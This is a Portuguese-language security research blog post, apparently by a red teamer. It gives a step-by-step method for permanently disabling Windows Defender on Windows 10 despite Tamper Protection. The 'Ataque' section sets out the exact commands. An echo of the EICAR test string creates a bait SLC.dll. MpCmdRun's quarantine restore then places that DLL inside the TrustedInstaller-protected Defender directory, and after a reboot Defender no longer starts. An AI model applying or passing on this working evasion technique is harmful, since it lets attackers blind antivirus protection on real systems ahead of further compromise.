> For the complete documentation index, see [llms.txt](https://stacked-rwx.gitbook.io/public/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://stacked-rwx.gitbook.io/public/researchs/bypass-tamper-protection-trusted-installer-and-killing-windows-defender.md).

# Bypass Tamper Protection, Trusted Installer, and Killing Windows Defender

Quero deixar registrado meu agradecimento ao DMX pelo apoio, e principalmente à equipe HoS.

**GitHub HackerOnSteroids:** <https://github.com/hackersonsteroids>\
**DMX:** <https://www.linkedin.com/in/davimtrindade/>\
**Me:** <https://www.linkedin.com/in/rafael-rom%C3%A3o/>

Agora, vamos ao que interessa!\
\
Testado na versão **10.0.19045.6216** do **Windows 10.**

## Introdução

Antes de entrarmos de cabeça no conteúdo, quero esclarecer alguns termos para que você prossiga no artigo com uma melhor compreensão.

### O que é Trusted Installer?

* O **Trusted Installer** é um serviço interno do Windows responsável por instalar, modificar e remover componentes críticos do sistema operacional, como atualizações do Windows, drivers de segurança e recursos protegidos.\
  \
  Esse serviço possui mais privilégios do que a própria conta de **Administrador** e é utilizado principalmente pelo **Windows Modules Installer Service** (*TrustedInstaller.exe*).\
  \
  Em outras palavras, o diretório do **Windows Defender** é totalmente protegido pelo Trusted Installer. Isso torna **impossível**, pelos métodos convencionais, apagar ou modificar qualquer arquivo dentro desse diretório.

<figure><img src="/files/46YG7OSTkhS3cBeBGWBs" alt=""><figcaption></figcaption></figure>

### **O que é Tamper Protection?**

* O **Tamper Protection** é um recurso de segurança do **Windows Defender** projetado para impedir que malwares, scripts ou usuários não autorizados alterem as configurações de proteção do antivírus ou desativem seus recursos críticos.\
  \
  A função desse mecanismo é proteger o próprio Windows Defender contra desativação ou manipulação, algo muito comum em ataques avançados, como **ransomwares**, **rootkits** e **trojans**. \
  \
  Quando o Tamper Protection está habilitado, **nem mesmo um usuário com privilégios de Administrador consegue desativar manualmente o Windows Defender** por métodos convencionais, garantindo uma camada extra de segurança contra ameaças persistentes.

<figure><img src="/files/97UEMuTamnRnQN5tO8Mr" alt=""><figcaption></figcaption></figure>

## Ataque

Antes de tudo, é necessário que você tenha **acesso administrativo** na rede. Caso ainda não possua privilégios de Administrador, recomendo obtê-los para que consiga executar o passo a passo com sucesso.

Em seguida, abra o **cmd.exe** como Administrador e digite o seguinte comando:

```powershell
"C:\ProgramData\Microsoft\Windows Defender\Platform\sua-versao\MpCmdRun.exe" -Restore -ListAll
```

Esse comando listará todos os arquivos em quarentena.

<figure><img src="/files/qzDECpZLc5tPOm51kYRs" alt=""><figcaption></figcaption></figure>

Essa é a .dll que eu criei e para fazê-lo, execute o seguinte comando:

```powershell
echo X5O!P%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > %TEMP%\SLC.dll
```

Após executar o comando, o **Windows Defender** irá detectar a ação e **encaminhar o arquivo para o modo de quarentena**.

<figure><img src="/files/K2SAPP0oDdyMagUwcQty" alt=""><figcaption></figcaption></figure>

Considerando que **não é possível escrever diretamente na pasta do Windows Defender**, por que não tentar **usar o próprio Windows Defender para contornar suas próprias proteções** e adicionar arquivos dentro do diretório protegido pelo **Trusted Installer**?

Ao obter o **nome do ThreatName** ao listar os arquivos em quarentena, podemos utilizar o seguinte comando:

```powershell
"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\MpCmdRun.exe" -Restore -Name Virus:DOS/EICAR_Test_File -Path "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0"
```

**Observação:** é necessário utilizar as aspas `""` junto ao nome do diretório.

Com isso, obtemos o seguinte resultado:

<figure><img src="/files/PvmgOFPI8ZTEw6STFDMJ" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/XFEQSVejiCc6YrEKubFq" alt=""><figcaption></figcaption></figure>

Vejam só! Consegui adicionar a **.dll** dentro do diretório do **Windows Defender**.

Para provar que **realmente não é possível fazer isso pelos métodos convencionais**, observe o seguinte:

<figure><img src="/files/NFeZhJFRJVnWH2SoSQMw" alt=""><figcaption></figcaption></figure>

E dando permissão:

<figure><img src="/files/4fedCluKFmjbjg4lAmXU" alt=""><figcaption></figcaption></figure>

Ou seja, **não é possível realizar essa ação manualmente**, e muito menos pelo **cmd**, mesmo estando logado como Administrador.

<figure><img src="/files/37WkRlXCMV4UULtpr9zk" alt=""><figcaption></figcaption></figure>

### Reiniciando

Agora, vamos **reiniciar a máquina**.

<figure><img src="/files/8BCIeIch0XIdw3hIqC22" alt=""><figcaption></figcaption></figure>

Após reiniciar, é possível observar que o **Windows Defender apresenta uma lentidão** ao tentar obter algumas informações de proteção:

<figure><img src="/files/rA2UJjf6gS5stOTtbQ2s" alt=""><figcaption></figcaption></figure>

Aguardando um pouco, aparenta estar tudo certo:

<figure><img src="/files/fOXvxqZSjYna0m8RfRPz" alt=""><figcaption></figcaption></figure>

Clicando em gerenciar configurações:

<figure><img src="/files/G1RuT0pemk1yqZmzRQjv" alt=""><figcaption></figcaption></figure>

E depois de alguns minutos...

<figure><img src="/files/Zl0pynRURrQA26DWavEo" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/OdeqgmsbwdWIEi36MurH" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/OBEv377KSeVxESPT9ggS" alt=""><figcaption></figcaption></figure>

Observe um detalhe no **System Informer**:

<figure><img src="/files/lSSFhcNBzYLwEtd37jLb" alt=""><figcaption></figcaption></figure>

O Windows Defender está tentando iniciar mas não consegue :D

Observando no Procmon:

<figure><img src="/files/0kO8jYGYIem0ylKofzyj" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/K3bucUR375ztB00JxJEV" alt=""><figcaption></figcaption></figure>

Absolutamente nada!

E se eu tentar reiniciar?

<figure><img src="/files/y8FL43046ZVdB7yA23oc" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/lNmsVeRmM729o5Ye4CV2" alt=""><figcaption></figcaption></figure>

Definitivamente, o **Windows Defender foi desativado** e, mesmo reiniciando a máquina de forma convencional, ele **não retorna**.

Sempre que for iniciado, o Defender irá **carregar a SLC.dll**, o que fará com que seja desativado novamente.

## Final

Esta pesquisa demandou algum tempo e, sinceramente, é apenas a **primeira de muitas que virão**.

Definitivamente, os estudos de **desenvolvimento de malware** são essenciais para qualquer **pesquisador ou red teamer**.

Até mais!
